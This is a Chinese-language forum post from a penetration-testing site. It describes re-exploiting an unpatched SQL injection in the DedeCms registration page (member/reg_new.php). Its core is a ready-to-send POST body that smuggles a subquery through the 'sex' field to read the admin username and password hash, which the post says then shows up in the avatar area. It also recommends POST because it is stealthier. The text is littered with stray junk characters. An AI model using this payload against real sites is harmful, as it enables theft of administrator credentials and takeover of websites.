中国网络渗透测试联盟

标题: DedeCms SQL注射漏洞再利用 [打印本页]

作者: admin    时间: 2012-12-5 10:03
标题: DedeCms SQL注射漏洞再利用
dedecms版本 20121122' h4 y" z" c3 p2 d- j! S+ U
2 R# G3 V- z9 O$ Y0 j, K9 Q
需要magic_quotes_gpc=Off
- T3 \: O( k6 m% R: f4 ~# d# N- |; y4 {" S' T
应该是没有什么大危害的漏洞.) P8 X: E: P" u2 j$ P* H
原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
' k, ~. L/ _. }/ M" r# ?" E$ R8 l
" }  s* W( H! a) n. u3 ~7 T- H" l是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.# A- V3 `0 s0 V, l3 s, I! `
POST提交以下数据,其实不用POST提交的,这样隐蔽点.) h$ |" ?/ Z* J8 b

" w: u' t+ m5 l) E# J* thttp:///de/member/reg_new.php8 b% \7 T" C  z7 g2 u( B. U& F/ e
( k  _. ^3 l; h8 @
POST" U0 n4 r. o) h& y6 Y

9 h6 I+ n4 H( M6 r, T2 v7 Qdopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=: M" W) s: Y0 }; Q( z+ _. f9 ]
" `% G6 ?2 t$ Q% C3 s
成功注册后,头像处里面有好玩的信息.! T3 ?% N6 f. c) T$ ?$ V

$ `# u1 u- Q% F2 C5 e




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2